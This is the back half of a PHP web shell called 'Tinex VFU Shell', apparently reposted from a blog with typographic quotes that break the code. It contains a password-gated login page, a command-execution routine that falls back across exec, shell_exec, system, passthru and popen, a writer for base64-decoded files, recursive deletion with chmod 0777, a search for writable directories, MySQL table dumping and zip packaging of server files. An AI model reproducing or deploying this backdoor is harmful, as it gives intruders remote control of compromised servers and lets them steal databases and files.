makehide(‚action‘,’phpenv‘);
makeinput(array(‚title’=>’Please input PHP configuration parameter(eg:magic_quotes_gpc)‘,’name’=>’phpvarname‘,’value’=>$phpvarname,’newline’=>1));
formfooter();
$hp = array(0=> ‚Server‘, 1=> ‚PHP‘);
for($a=0;$a<2;$a++) {
p(‚<h2>‘.$hp[$a].‘ »</h2>‘);
p(‚<ul class="info">‘);
if ($a==0) {
for($i=1;$i<=9;$i++) {
p(‚<li><u>‘.$info[$i][0].‘:</u>‘.$info[$i][1].'</li>‘);
}
} elseif ($a == 1) {
for($i=10;$i<=23;$i++) {
p(‚<li><u>‘.$info[$i][0].‘:</u>‘.$info[$i][1].'</li>‘);
}
}
p(‚</ul>‘);
}
}//end phpenv
else {
m(‚Undefined Action‘);
}
?>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
Copyright (C) 2012-2013 <B></B> – <a href=’https://twitter.com/DamaneDz‘ target=_blank><B>Follow Me ^_^ – </B></a><B></B> Is Not My Own Shell I’m Just The Developer.
</div>
</body>
</noscript>
<?php
/*======================================================
Show info shell
======================================================*/
function m($msg) {
echo ‚<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">‘;
echo $msg;
echo ‚</div>‘;
}
function scookie($key, $value, $life = 0, $prefix = 1) {
global $admin, $timestamp, $_SERVER;
$key = ($prefix ? $admin[‚cookiepre‘] : “).$key;
$life = $life ? $life : $admin[‚cookielife‘];
$useport = $_SERVER[‚SERVER_PORT‘] == 443 ? 1 : 0;
setcookie($key, $value, $timestamp+$life, $admin[‚cookiepath‘], $admin[‚cookiedomain‘], $useport);
}
function multi($num, $perpage, $curpage, $tablename) {
$multipage = “;
if($num > $perpage) {
$page = 10;
$offset = 5;
$pages = @ceil($num / $perpage);
if($page > $pages) {
$from = 1;
$to = $pages;
} else {
$from = $curpage – $offset;
$to = $curpage + $page – $offset – 1;
if($from < 1) {
$to = $curpage + 1 – $from;
$from = 1;
if(($to – $from) < $page && ($to – $from) < $pages) {
$to = $page;
}
} elseif($to > $pages) {
$from = $curpage – $pages + $to;
$to = $pages;
if(($to – $from) < $page && ($to – $from) < $pages) {
$from = $pages – $page + 1;
}
}
}
$multipage = ($curpage – $offset > 1 && $pages > $page ? ‚<a href="javascript:settable(\“.$tablename.’\‘, \’\‘, 1);">First</a> ‚ : “).($curpage > 1 ? ‚<a href="javascript:settable(\“.$tablename.’\‘, \’\‘, ‚.($curpage – 1).‘);">Prev</a> ‚ : “);
for($i = $from; $i <= $to; $i++) {
$multipage .= $i == $curpage ? $i.‘ ‚ : ‚<a href="javascript:settable(\“.$tablename.’\‘, \’\‘, ‚.$i.‘);">[‚.$i.‘]</a> ‚;
}
$multipage .= ($curpage < $pages ? ‚<a href="javascript:settable(\“.$tablename.’\‘, \’\‘, ‚.($curpage + 1).‘);">Next</a>‘ : “).($to < $pages ? ‚ <a href="javascript:settable(\“.$tablename.’\‘, \’\‘, ‚.$pages.‘);">Last</a>‘ : “);
$multipage = $multipage ? ‚<p>Pages: ‚.$multipage.'</p>‘ : “;
}
return $multipage;
}
// Login page
function loginpage() {
?>
<html>
<head>
<body bgcolor=black background=1.jpg>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>.::[ Tinex VFU Shell ]::. </title>
<style type="text/css">
A:link {text-decoration: none; color: green }
A:visited {text-decoration: none;color:red}
A:active {text-decoration: none}
A:hover {text-decoration: underline; color: green;}
input, textarea, button
{
font-size: 11pt;
color: #FFFFFF;
font-family: verdana, sans-serif;
background-color: #000000;
border-left: 2px dashed #8B0000;
border-top: 2px dashed #8B0000;
border-right: 2px dashed #8B0000;
border-bottom: 2px dashed #8B0000;
}
</style>
<BR><BR>
<div align=center >
<div>
<font color=gray>
<br /><br /><br /><br /><br />
<form method="POST" action="">
<span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
<input type="hidden" name="doing" value="login">
<input type="submit" value="Login">
</form>
<BR>
<?php
echo "".$err_mess."";
?>
<B><font color=red>
</div>
</fieldset>
</head>
</html>
<?php
exit;
}//end loginpage()
function execute($cfe) {
$res = “;
if ($cfe) {
if(function_exists(‚exec‘)) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists(’shell_exec‘)) {
$res = @shell_exec($cfe);
} elseif(function_exists(’system‘)) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists(‚passthru‘)) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = “;
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function cf($fname,$text){
if($fp=@fopen($fname,’w‘)) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
// Debug
function debuginfo() {
global $starttime;
$mtime = explode(‚ ‚, microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] – $starttime), 6);
echo ‚Processed in ‚.$totaltime.‘ second(s)‘;
}
// Function connect database
function dbconn($dbhost,$dbuser,$dbpass,$dbname=“,$charset=“,$dbport=’3306′) {
if(!$link = @mysql_connect($dbhost.‘:‘.$dbport, $dbuser, $dbpass)) {
p(‚<h2>Can not connect to MySQL server</h2>‘);
exit;
}
if($link && $dbname) {
if (!@mysql_select_db($dbname, $link)) {
p(‚<h2>Database selected has error</h2>‘);
exit;
}
}
if($link && mysql_get_server_info() > ‚4.1‘) {
if(in_array(strtolower($charset), array(‚gbk‘, ‚big5‘, ‚utf8′))) {
q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
}
}
return $link;
}
// Array strip
function s_array(&$array) {
if (is_array($array)) {
foreach ($array as $k => $v) {
$array[$k] = s_array($v);
}
} else if (is_string($array)) {
$array = stripslashes($array);
}
return $array;
}
// HTML Strip
function html_clean($content) {
$content = htmlspecialchars($content);
$content = str_replace("\n", "<br />", $content);
$content = str_replace(" ", " ", $content);
$content = str_replace("\t", " ", $content);
return $content;
}
// Chmod
function getChmod($filepath){
return substr(base_convert(@fileperms($filepath),10,8),-4);
}
function getPerms($filepath) {
$mode = @fileperms($filepath);
if (($mode & 0xC000) === 0xC000) {$type = ’s‘;}
elseif (($mode & 0x4000) === 0x4000) {$type = ‚d‘;}
elseif (($mode & 0xA000) === 0xA000) {$type = ‚l‘;}
elseif (($mode & 0x8000) === 0x8000) {$type = ‚-‚;}
elseif (($mode & 0x6000) === 0x6000) {$type = ‚b‘;}
elseif (($mode & 0x2000) === 0x2000) {$type = ‚c‘;}
elseif (($mode & 0x1000) === 0x1000) {$type = ‚p‘;}
else {$type = ‚?‘;}
$owner[‚read‘] = ($mode & 00400) ? ‚r‘ : ‚-‚;
$owner[‚write‘] = ($mode & 00200) ? ‚w‘ : ‚-‚;
$owner[‚execute‘] = ($mode & 00100) ? ‚x‘ : ‚-‚;
$group[‚read‘] = ($mode & 00040) ? ‚r‘ : ‚-‚;
$group[‚write‘] = ($mode & 00020) ? ‚w‘ : ‚-‚;
$group[‚execute‘] = ($mode & 00010) ? ‚x‘ : ‚-‚;
$world[‚read‘] = ($mode & 00004) ? ‚r‘ : ‚-‚;
$world[‚write‘] = ($mode & 00002) ? ‚w‘ : ‚-‚;
$world[‚execute‘] = ($mode & 00001) ? ‚x‘ : ‚-‚;
if( $mode & 0x800 ) {$owner[‚execute‘] = ($owner[‚execute‘]==’x‘) ? ’s‘ : ‚S‘;}
if( $mode & 0x400 ) {$group[‚execute‘] = ($group[‚execute‘]==’x‘) ? ’s‘ : ‚S‘;}
if( $mode & 0x200 ) {$world[‚execute‘] = ($world[‚execute‘]==’x‘) ? ‚t‘ : ‚T‘;}
return $type.$owner[‚read‘].$owner[‚write‘].$owner[‚execute‘].$group[‚read‘].$group[‚write‘].$group[‚execute‘].$world[‚read‘].$world[‚write‘].$world[‚execute‘];
}
function getUser($filepath) {
if (function_exists(‚posix_getpwuid‘)) {
$array = @posix_getpwuid(@fileowner($filepath));
if ($array && is_array($array)) {
return ‚ / <a href="#" title="User: ‚.$array[’name‘].’
Passwd: ‚.$array[‚passwd‘].’
Uid: ‚.$array[‚uid‘].’
gid: ‚.$array[‚gid‘].’
Gecos: ‚.$array[‚gecos‘].’
Dir: ‚.$array[‚dir‘].’
Shell: ‚.$array[’shell‘].’">‘.$array[’name‘].'</a>‘;
}
}
return “;
}
// Delete dir
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir($deldir.’/‘.$file)) && ($file!=‘.‘) && ($file!=‘..‘)) {
@chmod($deldir.’/‘.$file,0777);
deltree($deldir.’/‘.$file);
}
if (is_file($deldir.’/‘.$file)) {
@chmod($deldir.’/‘.$file,0777);
@unlink($deldir.’/‘.$file);
}
}
$mydir->close();
@chmod($deldir,0777);
return @rmdir($deldir) ? 1 : 0;
}
// Background
function bg() {
global $bgc;
return ($bgc++%2==0) ? ‚alt1‘ : ‚alt2‘;
}
// Get path
function getPath($scriptpath, $nowpath) {
if ($nowpath == ‚.‘) {
$nowpath = $scriptpath;
}
$nowpath = str_replace(‚\\‘, ‚/‘, $nowpath);
$nowpath = str_replace(‚//‘, ‚/‘, $nowpath);
if (substr($nowpath, -1) != ‚/‘) {
$nowpath = $nowpath.’/‘;
}
return $nowpath;
}
// Get up path
function getUpPath($nowpath) {
$pathdb = explode(‚/‘, $nowpath);
$num = count($pathdb);
if ($num > 2) {
unset($pathdb[$num-1],$pathdb[$num-2]);
}
$uppath = implode(‚/‘, $pathdb).’/‘;
$uppath = str_replace(‚//‘, ‚/‘, $uppath);
return $uppath;
}
// Config
function getcfg($varname) {
$result = get_cfg_var($varname);
if ($result == 0) {
return ‚No‘;
} elseif ($result == 1) {
return ‚Yes‘;
} else {
return $result;
}
}
// Function name
function getfun($funName) {
return (false !== function_exists($funName)) ? ‚Yes‘ : ‚No‘;
}
function GetList($dir){
global $dirdata,$j,$nowpath;
!$j && $j=1;
if ($dh = opendir($dir)) {
while ($file = readdir($dh)) {
$f=str_replace(‚//‘,’/‘,$dir.’/‘.$file);
if($file!=‘.‘ && $file!=‘..‘ && is_dir($f)){
if (is_writable($f)) {
$dirdata[$j][‚filename‘]=str_replace($nowpath,“,$f);
$dirdata[$j][‚mtime‘]=@date(‚Y-m-d H:i:s‘,filemtime($f));
$dirdata[$j][‚dirchmod‘]=getChmod($f);
$dirdata[$j][‚dirperm‘]=getPerms($f);
$dirdata[$j][‚dirlink‘]=ue($dir);
$dirdata[$j][’server_link‘]=$f;
$dirdata[$j][‚client_link‘]=ue($f);
$j++;
}
GetList($f);
}
}
closedir($dh);
clearstatcache();
return $dirdata;
} else {
return array();
}
}
function qy($sql) {
//echo $sql.'<br>‘;
$res = $error = “;
if(!$res = @mysql_query($sql)) {
return 0;
} else if(is_resource($res)) {
return 1;
} else {
return 2;
}
return 0;
}
function q($sql) {
return @mysql_query($sql);
}
function fr($qy){
mysql_free_result($qy);
}
function sizecount($size) {
if($size > 1073741824) {
$size = round($size / 1073741824 * 100) / 100 . ‚ G‘;
} elseif($size > 1048576) {
$size = round($size / 1048576 * 100) / 100 . ‚ M‘;
} elseif($size > 1024) {
$size = round($size / 1024 * 100) / 100 . ‚ K‘;
} else {
$size = $size . ‚ B‘;
}
return $size;
}
// Zip
class PHPZip{
var $out=“;
function PHPZip($dir) {
if (@function_exists(‚gzcompress‘)) {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this -> GetFileList($dir);//File list
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename, ‚r‘);
$content = @fread ($fd, filesize($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this -> addFile($content, $filename);
}
}
$this->out = $this -> file();
chdir($curdir);
}
return 1;
}
else return 0;
}
// Show file list
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while ($file = readdir($dh)) {
if($file!=‘.‘ && $file!=‘..‘){
$f=$dir .’/‘. $file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}
closedir($dh);
}
}
return $a;
}
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray[‚year‘] < 1980) {
$timearray[‚year‘] = 1980;
$timearray[‚mon‘] = 1;
$timearray[‚mday‘] = 1;
$timearray[‚hours‘] = 0;
$timearray[‚minutes‘] = 0;
$timearray[’seconds‘] = 0;
} // end if
return (($timearray[‚year‘] – 1980) << 25) | ($timearray[‚mon‘] << 21) | ($timearray[‚mday‘] << 16) |
($timearray[‚hours‘] << 11) | ($timearray[‚minutes‘] << 5) | ($timearray[’seconds‘] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace(‚\\‘, ‚/‘, $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = ‚\x‘ . $dtime[6] . $dtime[7]
. ‚\x‘ . $dtime[4] . $dtime[5]
. ‚\x‘ . $dtime[2] . $dtime[3]
. ‚\x‘ . $dtime[0] . $dtime[1];
eval(‚$hexdtime = "‘ . $hexdtime . ‚";‘);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) – 4), 2);
$fr .= pack(‚V‘, $crc);
$fr .= pack(‚V‘, $c_len);
$fr .= pack(‚V‘, $unc_len);
$fr .= pack(‚v‘, strlen($name));
$fr .= pack(‚v‘, 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack(‚V‘, $crc);
$fr .= pack(‚V‘, $c_len);
$fr .= pack(‚V‘, $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode(“, $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack(‚V‘, $crc);
$cdrec .= pack(‚V‘, $c_len);
$cdrec .= pack(‚V‘, $unc_len);
$cdrec .= pack(‚v‘, strlen($name) );
$cdrec .= pack(‚v‘, 0 );
$cdrec .= pack(‚v‘, 0 );
$cdrec .= pack(‚v‘, 0 );
$cdrec .= pack(‚v‘, 0 );
$cdrec .= pack(‚V‘, 32 );
$cdrec .= pack(‚V‘, $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode(“, $this -> datasec);
$ctrldir = implode(“, $this -> ctrl_dir);
return $data . $ctrldir . $this -> eof_ctrl_dir . pack(‚v‘, sizeof($this -> ctrl_dir)) . pack(‚v‘, sizeof($this -> ctrl_dir)) . pack(‚V‘, strlen($ctrldir)) . pack(‚V‘, strlen($data)) . "\x00\x00";
}
}
// Dump mysql
function sqldumptable($table, $fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n";
$firstfield=1;
$fields = q("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
if (!$firstfield) {
$tabledump .= ",\n";
} else {
$firstfield=0;
}
$tabledump .= " $field[Field] $field[Type]";
if (!empty($field["Default"])) {
$tabledump .= " DEFAULT ‚$field[Default]’";
}
if ($field[‚Null‘] != "YES") {
$tabledump .= " NOT NULL";
}
if ($field[‚Extra‘] != "") {
$tabledump .= " $field[Extra]";
}
}
fr($fields);
$keys = q("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
$kname=$key[‚Key_name‘];
if ($kname != "PRIMARY" && $key[‚Non_unique‘] == 0) {
$kname="UNIQUE|$kname";
}
if(!is_array($index[$kname])) {
$index[$kname] = array();
}
$index[$kname][] = $key[‚Column_name‘];
}
fr($keys);
while(list($kname, $columns) = @each($index)) {
$tabledump .= ",\n";
$colnames=implode($columns,",");
if ($kname == "PRIMARY") {
$tabledump .= " PRIMARY KEY ($colnames)";
} else {
if (substr($kname,0,6) == "UNIQUE") {
$kname=substr($kname,7);
}
$tabledump .= " KEY $kname ($colnames)";
}
}
$tabledump .= "\n);\n\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
$rows = q("SELECT * FROM $table");
$numfields = mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows)) {
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter=-1;
$firstfield=1;
while (++$fieldcounter<$numfields) {
if (!$firstfield) {
$tabledump.=", ";
} else {
$firstfield=0;
}
if (!isset($row[$fieldcounter])) {
$tabledump .= "NULL";
} else {
$tabledump .= "’".mysql_escape_string($row[$fieldcounter])."’";
}
}
$tabledump .= ");\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
}
fr($rows);
if ($fp) {
fwrite($fp,"\n");
} else {
echo "\n";
}
}
function ue($str){
return urlencode($str);
}
function p($str){
echo $str."\n";
}
function tbhead() {
p(‚<table width="100%" border="0" cellpadding="4" cellspacing="0">‘);
}
function tbfoot(){
p(‚</table>‘);
}
function makehide($name,$value=“){
p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
}
function makeinput($arg = array()){
$arg[’size‘] = $arg[’size‘] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
$arg[‚extra‘] = $arg[‚extra‘] ? $arg[‚extra‘] : “;
!$arg[‚type‘] && $arg[‚type‘] = ‚text‘;
$arg[‚title‘] = $arg[‚title‘] ? $arg[‚title‘].'<br />‘ : “;
$arg[‚class‘] = $arg[‚class‘] ? $arg[‚class‘] : ‚input‘;
if ($arg[’newline‘]) {
p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
} else {
p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
}
}
function makeselect($arg = array()){
if ($arg[‚onchange‘]) {
$onchange = ‚onchange="‘.$arg[‚onchange‘].’"‘;
}
$arg[‚title‘] = $arg[‚title‘] ? $arg[‚title‘] : “;
if ($arg[’newline‘]) p(‚<p>‘);
p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
if (is_array($arg[‚option‘])) {
foreach ($arg[‚option‘] as $key=>$value) {
if ($arg[’selected‘]==$key) {
p("<option value=\"$key\" selected>$value</option>");
} else {
p("<option value=\"$key\">$value</option>");
}
}
}
p("</select>");
if ($arg[’newline‘]) p(‚</p>‘);
}
function formhead($arg = array()) {
!$arg[‚method‘] && $arg[‚method‘] = ‚post‘;
!$arg[‚action‘] && $arg[‚action‘] = $self;
$arg[‚target‘] = $arg[‚target‘] ? "target=\"$arg[target]\"" : “;
!$arg[’name‘] && $arg[’name‘] = ‚form1‘;
p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
if ($arg[‚title‘]) {
p(‚<h2>‘.$arg[‚title‘].‘ »</h2>‘);
}
}
function maketext($arg = array()){
!$arg[‚cols‘] && $arg[‚cols‘] = 100;
!$arg[‚rows‘] && $arg[‚rows‘] = 25;
$arg[‚title‘] = $arg[‚title‘] ? $arg[‚title‘].'<br />‘ : “;
p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
}
function formfooter($name = “){
!$name && $name = ’submit‘;
p(‚<p><input class="bt" name="‘.$name.’" id=\"‘.$name.’\" type="submit" value="Submit"></p>‘);
p(‚</form>‘);
}
function formfoot(){
p(‚</form>‘);
}
// Exit
function pr($a) {
echo ‚<pre>‘;
print_r($a);
echo ‚</pre>‘;
}
?>
[/php]